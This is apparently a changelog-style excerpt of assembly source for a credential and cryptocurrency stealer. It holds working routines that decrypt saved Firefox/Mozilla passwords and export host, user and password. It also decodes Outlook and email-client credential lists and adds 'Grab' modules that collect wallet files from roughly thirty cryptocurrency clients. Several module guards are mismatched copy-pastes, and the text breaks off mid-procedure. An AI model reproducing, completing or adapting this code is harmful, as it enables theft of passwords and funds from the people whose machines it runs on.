         invoke   MoveMem, url_cell_data, host, url_cell_len
      
         mov   user, NULL
         mov   pass, NULL
         
         .IF   mozilla_mode == MOZILLA_MODE_FTP_HTTP
            invoke   lstrlen, offset szMozillaFTP
            invoke   StrCmpNI, host, offset szMozillaFTP, eax
            IFDEF   GRAB_HTTP
            .IF   eax
               invoke   lstrlen, offset szMozillaHTTP
               invoke   StrCmpNI, host, offset szMozillaHTTP, eax
            .ENDIF
            .IF   eax
               invoke   lstrlen, offset szMozillaHTTPS
               invoke   StrCmpNI, host, offset szMozillaHTTPS, eax
            .ENDIF
            IFDEF   COLLECT_PROXY_SETTINGS
            .IF   eax
               invoke   lstrlen, offset szMozillaProxy
               invoke   StrCmpNI, host, offset szMozillaProxy, eax
            .ENDIF
            ENDIF
            ENDIF
         .ELSEIF mozilla_mode == MOZILLA_MODE_FIREFTP
            invoke   lstrlen, offset szMozillaFireFTP
            invoke   StrCmpNI, host, offset szMozillaFireFTP, eax
         .ELSEIF mozilla_mode == MOZILLA_MODE_EMAIL
            sub   eax, eax ; allow all hosts
         .ENDIF
         
         .IF   !eax
            ; user (can be empty for some record types)
            .IF   user_cell_len
               invoke   MozillaNSSDecryptPassword, user_cell_data, user_cell_len
               mov   user, eax
            .ENDIF
            
            ; pass
            invoke   MozillaNSSDecryptPassword, pass_cell_data, pass_cell_len
            mov   pass, eax
            
            .IF   host && pass
               ; export recovered data
               invoke   StreamWriteDWORD, target_stream, item_id
               invoke   StreamWriteString, target_stream, host
               invoke   StreamWriteString, target_stream, user
               invoke   StreamWriteString, target_stream, pass
            .ENDIF
         .ENDIF
         
         invoke   MemFree, user
         invoke   MemFree, pass
         invoke   MemFree, host
      .ENDIF

Line 8225 (code addition/deletion):
   ret
SQLiteProcessMozillaDataTable endp

SQLiteProcessMozillaSchemaTable proc stream, target_stream, row_array, cell_count, item_id
   LOCAL   cell_len: DWORD
   LOCAL   cell_type: DWORD
   LOCAL   cell_data: DWORD
   LOCAL   table_name: DWORD
   LOCAL   root_page: DWORD
   LOCAL   dwStatusCode: DWORD

   .IF   cell_count == 5
      ; Validate table column count
      invoke   SQLiteGetRecordArrayCell, row_array, 2, addr cell_len, addr cell_type, addr cell_data
      .IF   cell_type == SQLITE_DATATYPE_STR
         m2m   table_name, cell_data
         invoke   lstrcmpi, table_name, offset szMozillaLoginTable
         .IF   !eax
            invoke   SQLiteGetRecordArrayCell, row_array, 0, addr cell_len, addr cell_type, addr cell_data
            .IF   cell_type == SQLITE_DATATYPE_STR
               invoke   lstrcmp, offset szSQLite3TableType, cell_data
               .IF   !eax
                  invoke   SQLiteGetRecordArrayCell, row_array, 3, addr cell_len, addr cell_type, addr cell_data
                  .IF   cell_type == SQLITE_DATATYPE_INT
                     mov   eax, cell_data
                     m2m   root_page, dword ptr[eax]
                     
                     invoke   SQLiteGetRecordArrayCell, row_array, 4, addr cell_len, addr cell_type, addr cell_data
                     .IF   cell_type == SQLITE_DATATYPE_STR
                        mov   dwMozillaActionURLIndex, -1
                        mov   dwMozillaPassValueIndex, -1
                        mov   dwMozillaUserValueIndex, -1

                        invoke   SQLiteProcessSQL, cell_data, offset SQLiteProcessMozillaColDef
                        mov   dwStatusCode, TRUE
                        
                        .IF   (dwMozillaActionURLIndex != -1) && (dwMozillaPassValueIndex != -1) && (dwMozillaUserValueIndex != -1)
                           invoke   SQLiteReadPage, stream, target_stream, root_page, addr dwStatusCode, item_id, offset SQLiteProcessMozillaDataTable
                        .ENDIF
                     .ENDIF
                  .ENDIF
               .ENDIF   
            .ENDIF
         .ENDIF
      .ENDIF
      
Line 8271 (code deletion):
mov   dwSQLiteEncoding, eax etc....

Line 8272 (code edition):
SQLiteProcessMozillaSchemaTable endp

Line 8272 (code edition):
ProcessMozillaSQLiteFile proc target_stream, szSQLFileName, item_id

Line 8280 (code addition):
, item_id, offset SQLiteProcessMozillaSchemaTable

Line 8290 (code edition/remove):
ProcessSQLiteFile endp -> ProcessMozillaSQLiteFile endp
ChromeAppDataCommonSingleFileScan procedure deleted.

Line 8299 (comment added):
; Tested: Google Chrome 29.0.1547.66 m

Line 8374 (code edition):
ProcessSQLiteFile -> ProcessChromeSQLiteFile
Line 8375 (code edition):
ProcessSQLiteFile -> ProcessChromeSQLiteFile

Line 9307 (procedure rename, check Line 198):
         invoke   IsDataAlreadyProcessed, map.lpMem, map.dwFileSize

Line 10932 (code addition):
   mov   byte ptr[CWindowsMailPasswordList+1], 'P'
   mov   byte ptr[CWindowsMailSMTPPass+1], 'S'

Line 11392 (code addition):
   mov   byte ptr[CIncrediMailSMTPServer], 'S'
   mov   byte ptr[CIncrediMailSMTPPort], 'S'
   mov   byte ptr[CIncrediMailSMTPUser], 'S'
   mov   byte ptr[CIncrediMailSMTPPass], 'S'

Line 11622 (code deletion):
base_path, do_decrypt <- (removed 'do_encrypt')

Line 11734 (code deletion):
reg_key, S, 0 <- (removed '0')

Line 11959 (code addition):
   .IF   bListEncrypted
      mov   bListEncrypted, FALSE
      invoke   DecipherList, offset COutlookRegValues
      invoke   DecipherList, offset COutlookBinaryValues
      invoke   DecipherList, offset COutlookPassValues
      invoke   DecipherList, offset COutlookPassValues2
   .ENDIF

Line 12087 (code addition):
; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Bitcoin
; http://bitcoin.org
; Tested: 0.8.1-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_BITCOIN

.data
   CBitconWalletFile      db   'wallet.dat',0
   CBitcoinAppDataDir      db   '\Bitcoin',0

.code

GrabBitcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_BITCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CBitcoinAppDataDir, offset CBitconWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabBitcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Electrum
; http://electrum.org/
; Tested: 1.7.3
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_ELECTRUM

.data
   CElectrumWalletFile      db   'electrum.dat',0
   CElectrumAppDataDir      db   '\Electrum',0

.code

GrabElectrum proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_ELECTRUM, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CElectrumAppDataDir, offset CElectrumWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabElectrum endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; MultiBit
; http://multibit.org
; Tested: 0.5.9
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_ELECTRUM

.data
   CMultiBitWalletFile      db   '.wallet',0
   CMultiBitAppDataDir      db   '\MultiBit',0

.code

GrabMultiBit proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_MULTIBIT, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CMultiBitAppDataDir, offset CMultiBitWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabMultiBit endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; FTP Disk
; Tested: ver 1.2
; SFTP: implemented

IFDEF COMPILE_MODULE_FTPDISK

.data
   CFTPDiskAccountsFile   db   'Accounts.ini',0
   CFTPDiskAppDataDir      db   '\Maxprog\FTP Disk',0

.code

GrabFTPDisk proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_FTPDISK, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CFTPDiskAppDataDir, offset CFTPDiskAccountsFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabFTPDisk endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Litecoin
; https://litecoin.org/
; Tested: v0.8.5.1-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_LITECOIN

.data
   CLitecoinWalletFile      db   'wallet.dat',0
   CLitecoinAppDataDir      db   '\Litecoin',0

.code

GrabLitecoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_LITECOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CLitecoinAppDataDir, offset CLitecoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabLitecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Namecoin
; http://namecoin.info/
; Tested: 0.3.72
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_LITECOIN

.data
   CNamecoinWalletFile      db   'wallet.dat',0
   CNamecoinAppDataDir      db   '\Namecoin',0

.code

GrabNamecoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_NAMECOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CNamecoinAppDataDir, offset CNamecoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabNamecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Terracoin
; http://www.terracoin.org/
; Tested: v0.8.0.2
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_TERRACOIN

.data
   CTerracoinWalletFile      db   'wallet.dat',0
   CTerracoinAppDataDir      db   '\Terracoin',0

.code

GrabTerracoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_TERRACOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CTerracoinAppDataDir, offset CTerracoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabTerracoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Bitcoin Armory
; https://bitcoinarmory.com/
; Tested: Version 0.90-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_BITCOINARMORY

.data
   CBitcoinArmoryWalletFile   db   '.wallet',0
   CBitcoinArmoryAppDataDir   db   '\Armory',0

.code

GrabBitcoinArmory proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_BITCOINARMORY, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CBitcoinArmoryAppDataDir, offset CBitcoinArmoryWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabBitcoinArmory endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; PPCoin (Peercoin)
; https://ppcoin.com/
; Tested: v.0.3.0ppc-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_PPCOIN

.data
   CPPCoinWalletFile         db   'wallet.dat',0
   CPPCoinAppDataDir         db   '\PPCoin',0

.code

GrabPPCoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_PPCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CPPCoinAppDataDir, offset CPPCoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabPPCoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Primecoin
; http://primecoin.org/
; Tested: v0.1.2xpm-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_PRIMECOIN

.data
   CPrimecoinWalletFile      db   'wallet.dat',0
   CPrimecoinAppDataDir      db   '\Primecoin',0

.code

GrabPrimecoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_PRIMECOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CPrimecoinAppDataDir, offset CPrimecoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabPrimecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Feathercoin
; http://feathercoin.com/
; Tested: v0.6.4.4
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_PRIMECOIN

.data
   CFeathercoinWalletFile      db   'wallet.dat',0
   CFeathercoinAppDataDir      db   '\Feathercoin',0

.code

GrabFeathercoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_FEATHERCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CFeathercoinAppDataDir, offset CFeathercoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabFeathercoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; NovaCoin
; http://novaco.in/
; Tested: v0.4.4.0-g32a928e-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_NOVACOIN

.data
   CNovaCoinWalletFile         db   'wallet.dat',0
   CNovaCoinAppDataDir         db   '\NovaCoin',0

.code

GrabNovaCoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_NOVACOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CNovaCoinAppDataDir, offset CNovaCoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabNovaCoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Freicoin
; http://freico.in/
; Tested: v0.8.3.0-unk-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_FREICOIN

.data
   CFreicoinWalletFile         db   'wallet.dat',0
   CFreicoinAppDataDir         db   '\Freicoin',0

.code

GrabFreicoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_FREICOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CFreicoinAppDataDir, offset CFreicoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabFreicoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Devcoin
; http://devcoin.org/
; Tested: version 0.3.25.1-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_DEVCOIN

.data
   CDevcoinWalletFile         db   'wallet.dat',0
   CDevcoinAppDataDir         db   '\Devcoin',0

.code

GrabDevcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_DEVCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CDevcoinAppDataDir, offset CDevcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabDevcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Frankocoin
; http://frankos.org/
; Tested: v0.8.4.1-16-g5f1dafe-bet
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_FRANKOCOIN

.data
   CFrankocoinWalletFile         db   'wallet.dat',0
   CFrankocoinAppDataDir         db   '\Franko',0

.code

GrabFrankocoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_FRANKOCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CFrankocoinAppDataDir, offset CFrankocoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabFrankocoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; ProtoShares
; http://invictus-innovations.com/protoshares
; Tested: v0.8.5.0-unk-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_PROTOSHARES

.data
   CProtoSharesWalletFile         db   'wallet.dat',0
   CProtoSharesAppDataDir         db   '\ProtoShares',0

.code

GrabProtoShares proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_PROTOSHARES, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CProtoSharesAppDataDir, offset CProtoSharesWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabProtoShares endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Megacoin
; http://www.megacoin.co.nz
; Tested: v0.8.996.0MEGA-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_MEGACOIN

.data
   CMegacoinWalletFile            db   'wallet.dat',0
   CMegacoinAppDataDir            db   '\Megacoin',0

.code

GrabMegacoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_MEGACOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CMegacoinAppDataDir, offset CMegacoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabMegacoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Quarkcoin
; http://www.quarkcoin.com/
; Tested: v0.8.3.0-g09e437b-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_QUARKCOIN

.data
   CQuarkcoinWalletFile         db   'wallet.dat',0
   CQuarkcoinAppDataDir         db   '\Quarkcoin',0

.code

GrabQuarkcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_QUARKCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CQuarkcoinAppDataDir, offset CQuarkcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabQuarkcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; WorldCoin
; http://worldcoin.in
; Tested: v0.6.4.4-ga7433e7-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_WORLDCOIN

.data
   CWorldCoinWalletFile         db   'wallet.dat',0
   CWorldCoinAppDataDir         db   '\Worldcoin',0

.code

GrabWorldcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_WORLDCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CWorldCoinAppDataDir, offset CWorldCoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabWorldcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Infinitecoin
; http://infinitecoin.com/
; Tested: v1.8.0.0
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_WORLDCOIN

.data
   CInfinitecoinWalletFile         db   'wallet.dat',0
   CInfinitecoinAppDataDir         db   '\Infinitecoin',0

.code

GrabInfinitecoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_INFINITECOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CInfinitecoinAppDataDir, offset CInfinitecoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabInfinitecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Ixcoin
; http://ixcoin.org/
; Tested: 0.3.24.30-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_IXCOIN

.data
   CIxcoinWalletFile            db   'wallet.dat',0
   CIxcoinAppDataDir            db   '\Ixcoin',0

.code

GrabIxcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_IXCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CIxcoinAppDataDir, offset CIxcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabIxcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Anoncoin
; https://anoncoin.net
; Tested: v0.7.4b-5-gd36ff9d-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_IXCOIN

.data
   CAnoncoinWalletFile            db   'wallet.dat',0
   CAnoncoinAppDataDir            db   '\Anoncoin',0

.code

GrabAnoncoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_ANONCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CAnoncoinAppDataDir, offset CAnoncoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabAnoncoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; BBQcoin
; http://bbqcoin.org/
; Tested: v0.6.3.0-unk-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_BBQCOIN

.data
   CBBQcoinWalletFile            db   'wallet.dat',0
   CBBQcoinAppDataDir            db   '\BBQcoin',0

.code

GrabBBQcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_BBQCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CBBQcoinAppDataDir, offset CBBQcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabBBQcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Digitalcoin
; http://digitalcoin.co/en/
; Tested: v1.0.0.0-g3aaa7ba-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_DIGITALCOIN

.data
   CDigitalcoinWalletFile            db   'wallet.dat',0
   CDigitalcoinAppDataDir            db   '\Digitalcoin',0

.code

GrabDigitalcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_DIGITALCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CDigitalcoinAppDataDir, offset CDigitalcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabDigitalcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; MinCoin
; http://www.min-coin.org/
; Tested: v0.6.5.0-g498f5d1-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_MINCOIN

.data
   CMincoinWalletFile               db   'wallet.dat',0
   CMincoinAppDataDir               db   '\Mincoin',0

.code

GrabMincoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_MINCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CMincoinAppDataDir, offset CMincoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabMincoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; GoldCoin
; http://gldcoin.com/
; Tested: v0.7.1.6-gcf3abdf39d-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_GOLDCOIN

.data
   CGoldcoinWalletFile               db   'wallet.dat',0
   CGoldcoinAppDataDir               db   '\GoldCoin (GLD)',0

.code

GrabGoldcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_GOLDCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CGoldcoinAppDataDir, offset CGoldcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabGoldcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; YaCoin
; http://www.yacoin.org/
; Tested: v0.4.0.0-g2nd-yac-wm-alpha
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_YACOIN

.data
   CYacoinWalletFile               db   'wallet.dat',0
   CYacoinAppDataDir               db   '\Yacoin',0

.code

GrabYacoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_YACOIN, 0
   mov   hdr_ofs, eax
   
